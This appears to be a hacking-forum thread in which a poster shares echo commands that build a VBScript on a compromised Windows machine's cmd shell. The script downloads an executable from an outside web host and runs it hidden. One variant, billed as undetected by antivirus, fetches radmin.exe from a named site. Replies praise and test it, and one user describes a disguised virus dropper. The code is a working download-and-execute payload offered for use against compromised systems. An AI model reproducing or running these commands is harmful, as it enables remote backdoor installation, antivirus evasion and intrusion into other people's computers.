[boshcash]

I strongly recommend writing the exe using debug method if you are an experienced user here http://www.governmen...?showtopic=7255


This way is simple and is an addition to all ways that usually failed , lots of ppl asking what i can do with a cmd shell , and the known ways may all fail , which are tftp(may timeout) , ftp (may not connect correctly to server and also needs an ftp server and u must echo ur usr and pass if it doesnt allow anon. access ) , and net share commands ( mostly blocked by all ISPs now after the rpc exploit)


This way works by echoing a vbs file , and running that vbs file downloads an exe from an http site then executes it , u may remove execution from the vbs code (do what u wanna do)

I stole that code from the known IE object data vuln, and adding echoing to it, here 's the text which should be put in the shell

echo Dim DataBin>c:\madefile.vbs
echo Dim HTTPGET>>c:\madefile.vbs
echo Set HTTPGET = CreateObject("Microsoft.XMLHTTP")>>c:\madefile.vbs
echo HTTPGET.Open "GET", "http://www.samplesite.com/file.exe", False>>c:\madefile.vbs 
echo HTTPGET.Send>>c:\madefile.vbs
echo DataBin = HTTPGET.ResponseBody>>c:\madefile.vbs
echo Const adTypeBinary=1>>c:\madefile.vbs
echo Const adSaveCreateOverWrite=2>>c:\madefile.vbs
echo Dim SendBinary>>c:\madefile.vbs
echo Set SendBinary = CreateObject("ADODB.Stream")>>c:\madefile.vbs
echo SendBinary.Type = adTypeBinary>>c:\madefile.vbs
echo SendBinary.Open>>c:\madefile.vbs
echo SendBinary.Write DataBin>>c:\madefile.vbs
echo SendBinary.SaveToFile "c:\file.exe", adSaveCreateOverWrite>>c:\madefile.vbs

If u want to add Execution After Download , it would get detected by AVs : simply add :

echo Dim WshShell>>c:\madefile.vbs
echo Set WshShell = CreateObject("WScript.Shell")>>c:\madefile.vbs
echo WshShell.Run "c:\eject.exe", 0, false>>c:\madefile.vbs

u can replace the enter command that replaces everyline with "&" to make the command one time , but sometimes it hangs up the cmd shell , so be careful

Here is the UNDETECTED version by tianzhen :

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >webdown.vbs
echo xPost.Open "GET","http://www.finemakeit.com/client/_notes/radmin.exe",0 >>webdown.vbs
echo xPost.Send() >>webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>webdown.vbs
echo sGet.Mode = 3 >>webdown.vbs
echo sGet.Type = 1 >>webdown.vbs
echo sGet.Open() >>webdown.vbs
echo sGet.Write(xPost.responseBody) >>webdown.vbs
echo sGet.SaveToFile "radmin.exe",2 >>webdown.vbs
cscript webdown.vbs

gr33tz to all ppl , tell me ur opinion about that way !

[vnet576]

This looks like a very interesting method, I'm gonna test it out and let u know how it works for me. Thanks.

[c�h�]

very nice method
thanx

[derquakecommander]

i have test it on my private pc and thats (filtered) good :D
nice job dude very nice

[boshcash]

i always hoped to solve this file transfer problem , and at last i found a way and it would help all the people that have problems on how to make use of their cmd shell , and that way should work 100% , not like ftp or tftp or the net share , and problems mail/msg me @ boshcash@msn.com

[dennis28]

sweet me is going to test it

[Wolfman]

I ran it on my system (WinXP SP1) and had 2 errors (see pic).
Neverthless, the file still got downloaded.

Thanks for sharing.

Attached File(s)

•  error.JPG (23.58K)
  Number of downloads: 1277

[boshcash]

well , if its an error in the last three lines , they are not required because they execute the downloaded file , so if you dont want the download to be executed after download , or u have an error at the last three lines , simply remove them so last line will be BinaryStream.SaveToFile "c:\eject.exe", adSaveCreateOverWrite , any other help mail/msg me @ boshcash@msn.com

[andydis]

nice one boshcosh!,

when the lovebug vbs virus thing came out i wrote a batch file that echoed the whole code and extecuted it:-)

compiled the batch file to a .com

and renamedthe whole thing subject: my new webpage
and a domain name as the .com (the file was called a .com and icon looked like a link but it was in fact the virii)

very nasty piece of work and never released it :-)

the damage it could have caused :-)

:ph34r:

Diz UK

[passi]

niccce :) thanks dude!

[Action]

mcafee reads it, so its quite useless

[Uli]

Thanks for sharing :)